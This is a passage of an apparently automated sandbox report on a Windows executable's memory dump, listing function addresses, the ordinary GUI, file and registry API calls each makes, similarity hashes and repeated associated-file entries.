Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: eeef037f8d532aba808608ba2e2608f5ad78dde4c4c73e51c3fa385a09fdaef8
Instruction ID: 3ab67592e975b4b0c91210ecba32422d82d2f45fb3d2042fb05e181c8722349b
Opcode Fuzzy Hash: eeef037f8d532aba808608ba2e2608f5ad78dde4c4c73e51c3fa385a09fdaef8
Instruction Fuzzy Hash: 00016571A042087FD700DFA5D842B5DB7E9DB19714F5141BAF414A3391DB796920851D

Uniqueness

Uniqueness Score: -1.00%

Function 004AA180, Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000449,?,?), ref: 004AA1FB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4fd264f1d484155155ceb63f08e336f327c486bf43db2e8587be4178355d6c5d
Instruction ID: b1399a6e0d261bd4a70e698cd2da3fce8c27263347c229cce97fc1cba37eea5c
Opcode Fuzzy Hash: 4fd264f1d484155155ceb63f08e336f327c486bf43db2e8587be4178355d6c5d
Instruction Fuzzy Hash: 6811FA70A01209EFCB40DFA9C98599EBBF4EB09314F1081A6E948E7351E3349E50DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00483BA8, Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,00483C98,00000000,00000000,00483C03,?,00000000,00483C88), ref: 00483BEF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6f02c19c2c0410ee76ef681701853577e8f0a548b454b4c1afb6096b44590c21
Instruction ID: ec8458e9dfb4f787698b5bcf23f4a014e57f2dad102fc93167037afb8ff12b25
Opcode Fuzzy Hash: 6f02c19c2c0410ee76ef681701853577e8f0a548b454b4c1afb6096b44590c21
Instruction Fuzzy Hash: E701A771608704AFD705AF66DC5296EBBACE749F14B62487FF405E2680E63C5A109A28

Uniqueness

Uniqueness Score: -1.00%

Function 0045FFF8, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 00460054

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 82ee3fee61d26e50e49649728977328f34805d21dbc2901f38f8d39a87d19b0d
Instruction ID: 2adc6b513d2d03d358a797f50149a893bdca0ce90b39a6aad1cb033f243510af
Opcode Fuzzy Hash: 82ee3fee61d26e50e49649728977328f34805d21dbc2901f38f8d39a87d19b0d
Instruction Fuzzy Hash: F10181313087428BD3209A29D888B87F7E5EF81359F18866BA49987291DA749C45CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004C9FAC, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32 ref: 00470C53
Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59

SHPathPrepareForWriteW.SHELL32(00000000,00000000,00000000,00000000,00000000,004CA00B,?,00000000,?,?,004CA292,00000000,00000000,004CA31C), ref: 004C9FEF

Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
String ID:
API String ID: 3319771486-0
Opcode ID: 3e71745f51cbe0b1616a9ff7fb8c32456ac54885bd13feb405249b78da3a9349
Instruction ID: ab61ebd11688c1f5228e1637e4fd017bde6633cefa93b1203f381c591cdf9357
Opcode Fuzzy Hash: 3e71745f51cbe0b1616a9ff7fb8c32456ac54885bd13feb405249b78da3a9349
Instruction Fuzzy Hash: 79F02434244304EFF7158F66EC56F1A73E8F309718F61443AF104C3190DA7A9C50A629

Uniqueness

Uniqueness Score: -1.00%

Function 00404D08, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00404D51,?,00506050,00508AEC,00000000,?,00405126,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00404D41

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 82e28484aa4ffdda2716f707cc85c744c11c8d67b6de0af3a45fd8f77fb77c38
Instruction ID: dcf24da99e045fbfb9c0dccf37c60bf87a6854611da0e0255dfddfa7817901cf
Opcode Fuzzy Hash: 82e28484aa4ffdda2716f707cc85c744c11c8d67b6de0af3a45fd8f77fb77c38
Instruction Fuzzy Hash: DEF0E9713057055FD3214F5ABC91D27BB9CEFD8B703560437DA0493A51CA78DC00856C

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF2, Relevance: 1.5, APIs: 1, Instructions: 33windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,00000000), ref: 00415022

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5de256d1273c56407486b3b2b18b454f9c51500707d336b04d1538bb1563cdee
Instruction ID: b4e77840fe86c1a9a15b620e24bf89c841d9b994244da7b6d11ca4a9a5cce54a
Opcode Fuzzy Hash: 5de256d1273c56407486b3b2b18b454f9c51500707d336b04d1538bb1563cdee
Instruction Fuzzy Hash: 7BF0ED30204604BFD310EA2ACC42CA77FDCDB8EB94382843ABC08D3652EA789C1080AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D55C, Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,004214C8,0042640E,00000000,0042648C,?,?,004214C8), ref: 0040D5AA

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33fbb66747c8834440327381d792df763c1a2ec061d259a65456880232b21c3d
Instruction ID: bbad835874c720cd6cca721bf5eb63aec5f288e37c9e875c2527342672a8382f
Opcode Fuzzy Hash: 33fbb66747c8834440327381d792df763c1a2ec061d259a65456880232b21c3d
Instruction Fuzzy Hash: 58E06DA2B9052426E270B59D9CC2B8BA14ACB85779F194136F514EB2C1C0BC8C066368

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF4, Relevance: 1.5, APIs: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,00000000), ref: 00415022

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fb65fbd9a5d22e5868ae5a156bf56d1ae0d68fbf666a4fb3df8e53439fe0124a
Instruction ID: 15d5ac83eed9c3dcd1f8424a3613cd65ef4208e20a25ca006d7fb2729d27d5b8
Opcode Fuzzy Hash: fb65fbd9a5d22e5868ae5a156bf56d1ae0d68fbf666a4fb3df8e53439fe0124a
Instruction Fuzzy Hash: C2E0ED30204604BFD310EA2ACC42CA77FDCDB8EB94382843AB808D3652EA789C1080AC

Uniqueness

Uniqueness Score: -1.00%

Function 0045AF7C, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045AFB7

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c4643b4b68760a8d6199615b02a577f63622df5181be579b687e7404b3f1c16c
Instruction ID: ae7e1c5642afe656c6ce1464cd9707bf1fd320cf40c09bb8fbf1a9685e4a0d09
Opcode Fuzzy Hash: c4643b4b68760a8d6199615b02a577f63622df5181be579b687e7404b3f1c16c
Instruction Fuzzy Hash: 7EF0D4362042019FC704DF5CC8C498ABBE5FF89255F4446A8FA89CB356DA32E858CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004A494C, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

DrawTextW.USER32(?,00000000,00000000,?,?), ref: 004A4977

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 8cd70315d7187254e1599707e1ebb882dff13d65b8fa23297fc8c541d9ba8e7d
Instruction ID: d44062532e91153f92044cf75d8a343a9ddeda22a2273d3c524c09aff5e9e453
Opcode Fuzzy Hash: 8cd70315d7187254e1599707e1ebb882dff13d65b8fa23297fc8c541d9ba8e7d
Instruction Fuzzy Hash: 66E04FB37042147F6704DA9EADC1D6BF7ECDA99664310403AFA08E3301D574AD0182B8

Uniqueness

Uniqueness Score: -1.00%

Function 0048087C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: a71dd8b6ecc17ab16b5fd190bbb7372696dbcf7a8d05847f5d675a72fe716238
Instruction ID: aab9e7cd74eeccd42596a0313d2d04cd802c2727da9f391265aa23357043e6e1
Opcode Fuzzy Hash: a71dd8b6ecc17ab16b5fd190bbb7372696dbcf7a8d05847f5d675a72fe716238
Instruction Fuzzy Hash: 7EE0D860B6430225F27431490C53F7F11499FC0B00FA4483676809D7DAD6AD98D993DF

Uniqueness

Uniqueness Score: -1.00%

Function 0047EAF0, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,0047EB36,?,00000000,00000000,?,0047EB86,00000000,004AD259,00000000,004AD27A,?,00000000,00000000), ref: 0047EB19

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 01500d1026585a2ff11322f49bb50a5149f4299f696efe3803ac1df52f52bf88
Instruction ID: 2bb03c8bc3e63462193d8b19a19c0dc88d26945139d61dae7d8f27ec2ae29b2c
Opcode Fuzzy Hash: 01500d1026585a2ff11322f49bb50a5149f4299f696efe3803ac1df52f52bf88
Instruction Fuzzy Hash: 08E09231704344BFD711EB77CC53949B7ECE74C704BA288B6F405E3682E678AE108558

Uniqueness

Uniqueness Score: -1.00%

Function 0045FDFC, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,0045FE49), ref: 0045FE24

Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyErrorLastWindow
String ID:
API String ID: 1182162058-0
Opcode ID: ed97f2732f23317820cc0fa3120b3e2b72728ed258edb4b8ce61a385728d50ed
Instruction ID: 8bc6597d40b90e1f926ddf57c0d32e4619ab0118fdac3a5b753122f2e679815d
Opcode Fuzzy Hash: ed97f2732f23317820cc0fa3120b3e2b72728ed258edb4b8ce61a385728d50ed
Instruction Fuzzy Hash: 10F0A030604304EFD712CF69CA56D1EB7F8EB08B00B6200BAF804D3662E338ED08A619

Uniqueness

Uniqueness Score: -1.00%

Function 004080D0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004080EE

Part of subcall function 00408370: GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 0040838C
Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 004083AC
Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,?,00000000), ref: 004083CA
Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 004083E8
Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00408406
Part of subcall function 00408370: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 0040844F
Part of subcall function 00408370: RegQueryValueExW.ADVAPI32(?,00408698,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001), ref: 0040846D
Part of subcall function 00408370: RegCloseKey.ADVAPI32(?,004084AB,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040849E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 6d7ca68d75fa4230207e8bf5216afb727d6242516d6ec55213392f30d600521f
Instruction ID: 3970bc2d34380e59235853d60ecf92922676daedb8835f9a67ac2a530b45cafe
Opcode Fuzzy Hash: 6d7ca68d75fa4230207e8bf5216afb727d6242516d6ec55213392f30d600521f
Instruction Fuzzy Hash: 02E0C971A003209BCB14DE58C9C5A473794AF08764F0449AAED54DF396D775DD208BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004DE4AA, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(?,004DE4FD,?,00000005,00000000,00000000,?,004FCCF4,00000006,?,00000000,004FD285,?,00000000,004FD344), ref: 004DE4F0

Strings

cmd.exe, xrefs: 004DE51B
\Program Files, xrefs: 004DE37C
ProgramFilesDir, xrefs: 004DE355, 004DE3DC
Failed to get path of 64-bit Common Files directory, xrefs: 004DE42D
Common Files, xrefs: 004DE3C6
CommonFilesDir, xrefs: 004DE38F, 004DE40B
COMMAND.COM, xrefs: 004DE53C
SystemDrive, xrefs: 004DE2F2
Failed to get path of 64-bit Program Files directory, xrefs: 004DE3FE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
